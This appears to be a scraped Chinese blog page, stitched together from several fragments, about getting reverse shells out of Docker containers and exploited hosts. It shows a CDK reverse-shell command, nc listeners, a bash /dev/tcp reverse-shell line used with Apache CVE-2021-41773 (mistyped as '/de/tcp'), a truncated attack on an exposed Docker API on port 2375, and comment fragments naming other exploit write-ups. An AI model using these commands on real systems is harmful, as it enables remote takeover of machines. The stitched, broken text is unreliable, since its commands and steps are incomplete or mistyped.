文章前言本篇文章我们主要介绍一些在Docker中反弹shell到远程服务器的方法常见方法Step 1:在远程服务器端监听端口nc -lnvp 9999Step 2:通过CDK反弹shell#命令格式cdk run reverse-shell <ip>:<port>#使用实例cdk run reverse-shell 192.168.17.143:9999Step 3:成功获取到shell其他技巧我们还可以使用反引号...
什么是
反弹
shell
?
反弹
shell
(reverse
shell
),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse
shell
与telnet,ssh等标准
shell
对应,本质上是网络概念的客户端与服务端的角色反转。
为什么要
反弹
shell
?
通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
CVE-2021-41773-
反弹
shell
apache-CVE-2021-41773/42013 中存在RCE,可远程执行代码,本想利用bash
反弹
一个
shell
,奈何一直没有成功
bash -i >& /de/tcp/ip/port 0>&1
经典的bash
反弹
,确定环境和语句都没问题后,本地查看了靶机的日志,看到有如下报错,
很奇怪,为什么会有一个syntax error:Bad fd number的错误呢,而在本地kali中直接执行该语句,是没有问题的
目标靶机ip:192.168.30.101 (cente os 7)
攻击kali ip: 192.168.30.100 (kali2020.3)
访问出现版本泄露而且2375端口开放说明有未授权访问漏洞
在kali上开启监听1111端口
**nc -lvp 1111**
输入以下命令 ip为目标ip
docker
-H tcp://192.168.30.10
Error response from daemon: unable to find user ubuntu: no matching entries in passwd file
sdoyuxuan:
Thinkphp5.X 设计缺陷导致泄漏数据库账户密码
Sɪʟᴇɴᴛ .634:
CVE-2017-7269(iis6.0远程代码执行漏洞复现)
经常保持微笑:
CVE-2017-7269(iis6.0远程代码执行漏洞复现)
m0_72009681: